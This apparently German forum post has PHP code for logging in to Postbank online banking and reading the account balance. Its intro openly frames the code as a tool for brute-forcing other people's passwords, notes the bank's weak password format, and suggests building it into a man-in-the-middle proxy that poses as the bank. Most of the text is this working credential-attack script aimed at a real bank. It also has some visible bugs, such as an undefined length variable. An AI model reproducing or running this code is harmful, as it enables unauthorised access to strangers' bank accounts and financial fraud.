Die Postbank asswörter fürs Onlinbanking sind ja [A-Z0-9] mit midnestens
5 Stellen Länge, die Kontonummer (eines Gegenübers) bekommt man ja
einfach heraus.
Für den Fall dass jemand mal per Scirpt sein verlorenes Passwort wieder
herstellen muss folgender code in PHP so daß er leicht in einen Proxy zu
integrieren ist, etwa
um selbst als MAN IN THE MIDDEL als Pestbank aufzutreten! In die
vorletzte Zeile muss das per brute force ermittelte passwort:
postbank("285969607","GEHEIM");
Das Script gibt bei Erfolg den Kontostand aus, ... mal so als Anfang ...
https://banking.postbank.de/rai/login
*/
function readheader($fres) {
$nhdr = 0;
$sshdr = "";
while (true) {
$shdr .= fread($fres, 1);
$nhdr += 1;
if ($nhdr >= 4) {
if (substr($shdr, ($nhdr - 4), 4) == "\r\n\r\n") {
break;
}
}
}
return $shdr;
}
function headervalue($shdr, $sfld, $case = true) {
$sval = "";
$sprv = "";
$aHDR = explode("\r\n", $shdr);
$nHDR = count($aHDR);
$nhdr = 0;
while ($nhdr < $nHDR) {
$ahdr = explode(":", $aHDR[$nhdr], 2);
if (count($ahdr) == 2) {
$sprv = $ahdr[0];
} else {
if (($sprv != "") && ($ahdr[1] == "")) {
$ahdr[1] = $ahdr[0];
$ahdr[0] = $sprv;
}
}
if ($ahdr[0] == $sfld) {
if ($sval != "") {
$sval .= "\r\n";
}
$sval .= $ahdr[1];
} else {
if ($case != true) {
if (strtolower($ahdr[0]) == strtolower($sfld)) {
if ($sval != "") {
$sval .= "\r\n";
}
$sval .= $ahdr[1];
}
}
}
$nhdr++;
}
return $sval;
}
function readchunked($fres) {
$nbdy = 0;
$sbdy = "";
while (true) {
$nckh = 0;
$sckh = "";
while (true) {
$sckh .= fread($fres, 1);
$nckh += 1;
if ($nckh >= 2) {
if (substr($sckh, ($nckh - 2), 2) == "\r\n") {
break;
}
}
}
//echo "\$sckh '" . htmlentities($sckh) ."'";
$nckb = 0;
$sckb = "";
$npos = strpos($sckh,"\r\n");
if ($npos !== false) {
if ($npos > 0) {
$nhex = substr($sckh, 0, $npos);
$nckb = hexdec($nhex);
//echo " \$nckb " . $nckb ."\r\n
";
if ($nckb > 0) {
while (strlen($sckb) < $nckb) {
$sckb .= fread($fres, 1);
}
// $sckb = fread($fres, $nckb);
$nbdy += $nckb;
$sbdy .= $sckb;
} else {
// trailing \r\n
$sckb = fread($fres, 2);
if ($sckb == "\r\n") {
break;
}
}
}
}
}
return $sbdy;
}
//ob_start();
set_time_limit(10);
//foreach($_SERVER as $key_name => $key_value) { echo "" .
$key_name . " = " . $key_value . "\n
\n"; }
function postbank($snum, $spin) {
$NDBG=0;
$sres = "";
$nerr = 0;
$serr = "";
$ssrv="banking.postbank.de";
$sreq = "";
$sres = "";
if ($fres = fsockopen ("ssl://" . $ssrv, 443, $nerr, $serr)) {
$sreq="";
$shdr="";
$sbdy="";
$surl="/rai/login?-1.IFormSubmitListener-login-loginForm";
$spst = "";
$spst .= "id3_hf_0=&";
$spst .= "jsDisabled=false&";
$spst .= "kennwort=" . $spin;
$spst .= "&loginButton=Anmelden";
$spst .= "&nutzername=" . $snum ;
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($spst != "") {
$sreq .= "Content-Type: application/x-www-form-urlencoded\r\n";
$sreq .= "Content-length: " . strlen($spst) . "\r\n";
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($spst != "") {
$sreq .= $spst . "\r\n";
$sreq .= "\r\n";
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
$sCOK = "";
$scok = headervalue($shdr, "Set-Cookie", false);
$acok = explode("\r\n",$scok);
$nCOK = count($acok);
$ncok = 0;
while ($ncok <= $nCOK) {
$acok[$ncok] = trim($acok[$ncok]);
if (strlen($acok[$ncok]) >= 11) {
if (substr($acok[$ncok],0,11) == "JSESSIONID=") {
$npos = strpos($acok[$ncok], "; Path=/");
if ($npos !== false) {
$acok[$ncok] = substr($acok[$ncok],0,$npos);
}
$sCOK .= "Cookie: " . $acok[$ncok] . "\r\n";
}
}
// echo $ncok . ". " . $acok[$ncok] . "\r\n
";
$ncok++;
}
$scok = $sCOK;
//echo $scok;
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
//echo $surl;
$spst="";
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
//echo $surl;
$spst="";
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
//echo $surl;
$spst="";
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
$shdr = readheader($fres);
$senc = headervalue($shdr, "Transfer-Encoding", false);
$senc = trim($senc);
if ($senc == "chunked") {
$nbdy = -1;
$sbdy = readchunked($fres);
$nbdy = strlen($sbdy);
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
$sopn="";
$nopn = strpos($sbdy, $sopn);
if ($nopn !== false) {
$nopn += strlen($sopn);
$scls = "
";
$ncls = strpos($sbdy, $scls, $nopn);
if ($ncls !== false) {
$seur=substr($sbdy, $nopn , ($ncls - $nopn));
echo "EURO " . $seur ;
}
}
}
}
postbank("0123456789","BRUTEFORCE");
exit(0);
?>